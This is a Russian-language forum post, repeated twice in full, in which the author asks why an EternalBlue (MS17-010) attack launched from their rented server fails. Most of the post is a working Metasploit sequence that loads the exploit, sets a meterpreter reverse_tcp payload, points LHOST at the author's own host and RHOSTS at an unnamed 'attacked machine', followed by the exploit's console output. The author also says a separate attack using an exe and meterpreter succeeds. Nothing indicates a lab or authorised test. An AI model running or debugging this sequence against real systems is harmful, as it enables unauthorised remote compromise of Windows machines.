Здравствуйте, пользователи форума.
Пытаюсь провести атаку Eternalblue с моего VDS.
Буду краток.
sudo ./msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/reverse_tcp(пробовал с windows/x64/meterpreter/reverce_tcp)
set LPORT 7775
set LHOST *public dns*
set RHOSTS *ip атакуемой машины*
run
[*] Started reverse TCP handler on мой ip:7775
[*] ip атакуемой машины:445 - Connecting to target for exploitation.
[+] ip атакуемой машины:445 - Connection established for exploitation.
[+] ip атакуемой машины:445 - Target OS selected valid for OS indicated by SMB reply
[*] ip атакуемой машины:445 - CORE raw buffer dump (42 bytes)
[*] ip атакуемой машины:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] ip атакуемой машины:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] ip атакуемой машины:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] ip атакуемой машины:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] ip атакуемой машины:445 - Trying exploit with 12 Groom Allocations.
[*] ip атакуемой машины:445 - Sending all but last fragment of exploit packet
[*] ip атакуемой машины:445 - Starting non-paged pool grooming
[+] ip атакуемой машины:445 - Sending SMBv2 buffers
[+] ip атакуемой машины:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] ip атакуемой машины:445 - Sending final SMBv2 buffers.
[*] ip атакуемой машины:445 - Sending last fragment of exploit packet!
[*] ip атакуемой машины:445 - Receiving response from exploit packet
[-] ip атакуемой машины:445 - Did not receive a response from exploit packet
[*] ip атакуемой машины:445 - Sending egg to corrupted connection.
[-] ip атакуемой машины:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.
А вот если проводить обычную атаку посредством exe файла и meterpreter/reverce_tcp то всё в порядке.
В чём проблема?
Пытаюсь провести атаку Eternalblue с моего VDS.
Буду краток.
sudo ./msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/reverse_tcp(пробовал с windows/x64/meterpreter/reverce_tcp)
set LPORT 7775
set LHOST *public dns*
set RHOSTS *ip атакуемой машины*
run
[*] Started reverse TCP handler on мой ip:7775
[*] ip атакуемой машины:445 - Connecting to target for exploitation.
[+] ip атакуемой машины:445 - Connection established for exploitation.
[+] ip атакуемой машины:445 - Target OS selected valid for OS indicated by SMB reply
[*] ip атакуемой машины:445 - CORE raw buffer dump (42 bytes)
[*] ip атакуемой машины:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] ip атакуемой машины:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] ip атакуемой машины:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] ip атакуемой машины:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] ip атакуемой машины:445 - Trying exploit with 12 Groom Allocations.
[*] ip атакуемой машины:445 - Sending all but last fragment of exploit packet
[*] ip атакуемой машины:445 - Starting non-paged pool grooming
[+] ip атакуемой машины:445 - Sending SMBv2 buffers
[+] ip атакуемой машины:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] ip атакуемой машины:445 - Sending final SMBv2 buffers.
[*] ip атакуемой машины:445 - Sending last fragment of exploit packet!
[*] ip атакуемой машины:445 - Receiving response from exploit packet
[-] ip атакуемой машины:445 - Did not receive a response from exploit packet
[*] ip атакуемой машины:445 - Sending egg to corrupted connection.
[-] ip атакуемой машины:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.
А вот если проводить обычную атаку посредством exe файла и meterpreter/reverce_tcp то всё в порядке.
В чём проблема?
